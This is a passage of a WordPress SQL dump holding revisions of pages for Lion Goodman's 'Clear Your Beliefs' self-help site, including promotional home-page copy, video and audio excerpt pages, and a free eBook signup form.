less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 12:15:24', '2014-11-12 17:15:24', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1705, 2, '2014-11-12 12:17:16', '2014-11-12 17:17:16', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top:10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: 6px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center;margin-top: 18px;font-size: 18px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 12:17:16', '2014-11-12 17:17:16', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1706, 2, '2014-11-12 12:19:41', '2014-11-12 17:19:41', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top:10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: 2px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 12:19:41', '2014-11-12 17:19:41', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1707, 2, '2014-11-12 12:20:48', '2014-11-12 17:20:48', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top:10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: -2px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 12:20:48', '2014-11-12 17:20:48', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1708, 2, '2014-11-12 16:47:46', '2014-11-12 21:47:46', '', 'JSK Video Final', '', 'inherit', 'closed', 'open', '', 'jsk-video-final', '', '', '2014-11-12 16:47:46', '2014-11-12 21:47:46', '', 1340, 'http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSK-Video-Final.flv', 0, 'attachment', 'video/x-flv', 0),
(1710, 2, '2014-11-12 16:53:17', '2014-11-12 21:53:17', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 70%; margin: 0 auto;">\r\n[video width="640" height="480" flv="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSK-Video-Final.flv"][/video]\r\n<!--h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2--></div>\r\n\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-11-12 16:53:17', '2014-11-12 21:53:17', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1709, 2, '2014-11-12 16:49:21', '2014-11-12 21:49:21', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 70%; margin: 0 auto;">\r\n <video width="640" height="360" controls><source src="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSKvideo1.mp4" type="video/mp4"><source src="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSKvideo.webm" type="video/webm">Your browser does not support the video tag.</video>\r\n<!--h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2--></div>\r\n\r\n\r\n[video width="640" height="480" flv="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSK-Video-Final.flv"][/video]\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-11-12 16:49:21', '2014-11-12 21:49:21', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1711, 2, '2014-11-12 16:54:51', '2014-11-12 21:54:51', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 85%; margin: 0 auto;">\r\n[video width="640" height="480" flv="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSK-Video-Final.flv"][/video]\r\n<!--h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2--></div>\r\n\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-11-12 16:54:51', '2014-11-12 21:54:51', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1712, 2, '2014-11-12 16:56:56', '2014-11-12 21:56:56', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 85%; margin: 0 auto;">\r\n[video width="832" height="624" flv="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSK-Video-Final.flv"][/video]\r\n<!--h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2--></div>\r\n\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-11-12 16:56:56', '2014-11-12 21:56:56', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1713, 2, '2014-11-12 16:58:10', '2014-11-12 21:58:10', '<h1 style="color: #000000; text-align: center;"><strong>Introducing <em>The BeliefCloset Process</em> </strong>\r\n<strong>(Video)</strong></h1>\r\n&nbsp;\r\n\r\nIn this 6-minute video, Lion Goodman introduces <em>The BeliefCloset Process</em>, the methodology used in the <em>Clear Your Beliefs</em> program.\r\n\r\nClick below to start the video.\r\n<div style="width: 70%; margin: 0 auto;">\r\n[video width="640" height="480" flv="http://clearyourbeliefs.com/wp-content/uploads/2014/08/JSK-Video-Final.flv"][/video]\r\n<!--h2 style="text-align: center;"><a href="http://clearyourbeliefs.com/wp-content/uploads/resources/media/JSKvideo1.mp4">Intro Video</a></h2--></div>\r\n\r\n&nbsp;', 'Intro Video', '', 'inherit', 'closed', 'open', '', '1340-revision-v1', '', '', '2014-11-12 16:58:10', '2014-11-12 21:58:10', '', 1340, 'http://clearyourbeliefs.com/1340-revision-v1', 0, 'revision', '', 0),
(1714, 2, '2014-11-12 17:18:37', '2014-11-12 22:18:37', '"1-Clear Your Beliefs-01-10 min clip". Released: 2014.', '1-Clear Your Beliefs-01-10 min clip', '', 'inherit', 'closed', 'open', '', '1-clear-your-beliefs-01-10-min-clip-2', '', '', '2014-11-12 17:18:37', '2014-11-12 22:18:37', '', 1288, 'http://clearyourbeliefs.com/wp-content/uploads/2014/07/1-Clear-Your-Beliefs-01-10-min-clip1.mp3', 0, 'attachment', 'audio/mpeg', 0),
(1716, 2, '2014-11-12 17:20:31', '2014-11-12 22:20:31', '<h1 style="text-align: center;">A Sample from Session One of Clear Your Beliefs</h1>\n<strong>This ten-minute excerpt gives you a taste of what awaits you in the <em>Clear Your Beliefs</em> program.\n\n</strong>\n\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/07/1-Clear-Your-Beliefs-01-10-min-clip1.mp3"][/audio]\n\n\n<strong> </strong>\n\n&nbsp;\n\n&nbsp;', 'Session One Excerpt', '', 'inherit', 'closed', 'open', '', '1288-autosave-v1', '', '', '2014-11-12 17:20:31', '2014-11-12 22:20:31', '', 1288, 'http://clearyourbeliefs.com/1288-autosave-v1', 0, 'revision', '', 0),
(1717, 2, '2014-11-12 17:21:15', '2014-11-12 22:21:15', '"1-Clear Your Beliefs-01-10 min clip". Released: 2014.', '1-Clear Your Beliefs-01-10 min clip', '', 'inherit', 'closed', 'open', '', '1-clear-your-beliefs-01-10-min-clip-3', '', '', '2014-11-12 17:21:15', '2014-11-12 22:21:15', '', 1288, 'http://clearyourbeliefs.com/wp-content/uploads/2014/07/1-Clear-Your-Beliefs-01-10-min-clip2.mp3', 0, 'attachment', 'audio/mpeg', 0),
(1719, 2, '2014-11-12 17:22:56', '2014-11-12 22:22:56', '<h1 style="text-align: center;">A Sample from Session One of Clear Your Beliefs</h1>\r\n<strong>This ten-minute excerpt gives you a taste of what awaits you in the <em>Clear Your Beliefs</em> program.\r\n\r\n</strong>\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/1-Clear-Your-Beliefs-01-10-min-clip1.mp3">1-Clear Your Beliefs-01-10 min clip</a>\r\n\r\n<strong> </strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Session One Excerpt', '', 'inherit', 'closed', 'open', '', '1288-revision-v1', '', '', '2014-11-12 17:22:56', '2014-11-12 22:22:56', '', 1288, 'http://clearyourbeliefs.com/1288-revision-v1', 0, 'revision', '', 0),
(1718, 2, '2014-11-12 17:21:43', '2014-11-12 22:21:43', '<h1 style="text-align: center;">A Sample from Session One of Clear Your Beliefs</h1>\r\n<strong>This ten-minute excerpt gives you a taste of what awaits you in the <em>Clear Your Beliefs</em> program.\r\n\r\n</strong>\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/07/1-Clear-Your-Beliefs-01-10-min-clip1.mp3"][/audio]\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/1-Clear-Your-Beliefs-01-10-min-clip1.mp3">1-Clear Your Beliefs-01-10 min clip</a>\r\n\r\n[audio mp3="http://clearyourbeliefs.com/wp-content/uploads/2014/07/1-Clear-Your-Beliefs-01-10-min-clip2.mp3"][/audio]\r\n\r\n<strong> </strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Session One Excerpt', '', 'inherit', 'closed', 'open', '', '1288-revision-v1', '', '', '2014-11-12 17:21:43', '2014-11-12 22:21:43', '', 1288, 'http://clearyourbeliefs.com/1288-revision-v1', 0, 'revision', '', 0),
(1720, 2, '2014-11-12 17:27:55', '2014-11-12 22:27:55', '[su_box title="Free ebook!" box_color="#1a2d8c" radius="8"]\r\n<h2><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h2></center>\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n<p>This multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></p>\r\n\r\n\r\n<strong>You’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.</strong>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><strong>==>></strong> You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;"><strong>==>></strong> If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n\r\n\r\n</center> [/su_box]\r\n', 'ebook', '', 'publish', 'closed', 'open', '', 'ebook', '', '', '2015-05-29 12:51:09', '2015-05-29 17:51:09', '', 0, 'http://clearyourbeliefs.com/?page_id=1720', 0, 'page', '', 0),
(2191, 2, '2015-05-29 12:21:27', '2015-05-29 17:21:27', '<center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center>\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script>This multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</div>\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a 